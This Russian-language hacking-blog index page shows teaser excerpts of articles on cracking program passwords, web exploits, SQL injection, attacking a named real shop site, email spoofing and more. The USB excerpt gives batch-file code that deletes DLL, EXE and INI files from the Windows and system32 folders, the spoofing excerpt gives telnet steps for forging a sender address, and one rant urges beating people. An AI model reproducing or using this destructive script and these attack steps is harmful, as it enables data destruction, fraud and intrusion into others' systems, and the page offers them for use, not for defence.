Как разблокировать аккаунты, защитить компьютер и стать хакером
Полезные инструменты

Ваш IP

Узнай свой IP адрес

Проверить сайт

Test tools by WebSitePulse

Генератор MD5

1. Введите строку Строка:


2. Копировать MD5:

Реклама

Хакерство

интернетИногда при создании программ возникает необходимость несколько ограничить доступ к вашему продукту. В таких случаях обычно все используют стандартную форму в VB — Log In Dialog полагая, что это даёт стопроцентную защиту.
На самом деле это совсем не так! Меня давно интересовал вопрос о том возможно ли как-то подглядеть пароль из файла EXE и я понял, что действительно можно. Сегодня мы поговорим о том, как можно узнать пароль в программе EXE и о том, как защитить вашу программу от подобного рода взломов. Итак для начала создадим новый проект (Standart EXE) и кроме основной формы добавим в проект форму Log In Dialog (делается это с помощью диалогового окна Add Form, изображённого на предыдущей картинке). Читать далее

интернетконецформыначалоформыВ этой статье я бы хотел расказать вам молодые хакеры про такую вещь. С недавних пор мы в замечаем много людей которые в чатах/форумах говорят что ОНИ «крутые хакеры»! Так вот я распределил взломщиков по трём котегореям:
1.ламеры
2.крэкэры
3.хакеры
И щас я вам раскажу про них подробней.
Итак ламеры. Если вы скажете что вы знаете что такое ламер то вы наверно ошибаетесь.
Ламеры это люди не те которые компом не умеют пользоватса,а те которые юзают проги для взлома созданные другими и которые(люди) говорят что они кулхацкеры!Бейте этим людям в морду и когда они упадут добивайте!!!
Но я отошёл от темы….
Дальше крэкэры… Вот это люди более приближыны к хакерам. Они тоже юзают чужые проги но! Есть одно но. Читать далее

интернетконецформыначалоформыЗдравствуйте уважаемые читатели. Мы продолжаем значиться азами веб хакинга. Это 3 урок и вот какие темы мы сегодня разберем:

Сплоиты – структура и использование
Google hacking
Более подробное изучение таких уязвимостей как:
-sql injection
-xss
-php include

Сплоиты.
Или эксплоиты. Это программы или скрипты которые автоматически реализуют какую либо уязвимость. Мы будем знакомиться с эксплоитами для веб приложений.
Кроме них существуют эксплоиты для прикладных программ. Они более сложные и тебе пока рановато их изучать.
Итак, возьмем инъекцию из прошлого урока
http://www.site.us/main. Читать далее

интернетВсем привет!Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом! P.S Не судите строго это моя первая статья!
Так поехали!Жертва станет shop.iskusnitsa.ru!
Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!!Начнем с обследования сайта.
1:НАПЯЛИВАЕМ ПРОКСИ!!!Элиту есть такая прога как proxyswitcher! Вот ее советую, т.к. сам юзаю!Потом заходим на 2ip.ru;leader.ru;myip.ru и проверяемся если написано , что типо это не настоящий айпи а роутера и т.п. то меняем а если все норм приступаем!
2:Так походим по сылкам посмотрим где что и как переменые передаются!Сделали. Читать далее

интернетконецформыначалоформыПривет всем, я, kazin8, расскажу о взломе одной компании. Сразу скажу 2 вещи. Во-первых, взлом был «локальным», то есть я на минуту имел доступ к ПК, а во-вторых, статья будет в стиле недавней «Полночный взлом», написанной —stranger—’ом) Если еще не передумали – читаем.
1. Мой дом. 10.00
Мда. Проработав все лето в долбаной компании я до сих пор не получил ни копейки.. Только эта мысль крутилась у меня в голове. Зарплату задерживали уже почти на месяц.. А скоро учеба, нужна одежда, учебники. И вот опять, я услышал их «Приходите завтра, примерно в час». Ну что же, час так час. Посидев за ПК и поговорив с редом, я начал собираться «В поход на Изенгард») Уже в который раз.
2. Контора компании «ХХХ» 13. Читать далее

интернетБерем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________
в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *. Читать далее

интернетконецформыначалоформыЧтобы послать на мыло письмо, где в строке «От» стоял желаемый нами адрес надо сделать следующие: зателнетится к SMTP-серверу (поддерживающему операцию, которую мы сейчас проведем) на 25 порт. Это можно сделать входящей в комплект к Windows программой telnet.exe. Чтобы зателнетится надо ввести в командной строке следующие (сейчас и далее звездочкой (*) будет обозначаться SMTP-сервер, которые вы решили использовать для отправки письма от чужого адреса):
telnet.exe smtp.*.ru.
В ответ этому коннекту вы должны получить, что то похожее на:
220 smtp.*.ru ESMTP Sendmail 8.9.3/8.9.3; Mon, 27 May 2002 17:38:54 +0400 (MSD).
Код 220 означает коннект к серверу прошел успешно. Теперь давайте возьмем за цель послать на адрес lamer@mail.ru письмо якобы от support@mail.ru . Читать далее

интернетконецформыначалоформыХакерами не рождаются!
Ну что, приятель, задвинул на слабые попытки хакнуть банкомат соседского сбербанка? А зря! Ты что, думал, так всё сразу получится, подойдешь к нему с молотком и зубилом, и он тебе сразу все бабки выложит на блюдечке с голубой каемочкой? Ни фига! Хаку надо учиться, это искусство, это как на скейтборде кататься: вроде на доске, в принципе, любой стоять умеет, а вот с крыши прыгнуть на четыре колеса и шею не сломать — это децил сложнее. Поэтому готовься — если ты ещё не крутой хацкер, но очень хочешь им быть, мне есть что тебе рассказать. Читать далее

интернетВ данной статье я расскажу о поиске и использовании уязвимостей, присущих
большинству сценариев гостевых книг, доступных в сети. Статья будет состоять из
трех частей. В первой из них будут объяснены основные методы исследования
сценария, исходный код которого недоступен. В двух других частях, которые
появятся в последующих номерах журнала, будет описан процесс идентификации
уязвимостей в исходном коде и атаки страницы управления гостевой книгой,
соответственно. Я понимаю, что идея не нова, но поскольку подобные вопросы часто
задают, я решил составить документ, который бы раз и навсегда с этим покончил.
Здесь не будет рекомендаций по обезопасиванию своих программ от этого вида атак,
но внимательный программист сам поймет, что ему может угрожать и как это
предотвратить. Читать далее

интернетконецформыначалоформыХакеры взломали компьютерную сеть авторитетной антидопинговой лаборатории в Шатне-Малабри (Франция) и получили доступ к секретной информации, касающейся результатов анализов спортсменов, передает агентство Associated Press.
Расследованием обстоятельств этого дела занялась полиция парижского пригорода Нантер. Глава антидопингового агентства Франции Пьер Бордри попросил помощи у правительства Франции, подчеркнув, что необходимо обеспечить безопасность лаборатории.
По его словам, целью злоумышленников является дискредитация лаборатории в Шатне-Малабри. Читать далее

Скорость печати
Набирайте отображаемый текст и вы узнаете вашу скорость набора текста


Рейтинг@Mail.ru


Copyright © 2025 Как разблокировать аккаунт. Все права защищены.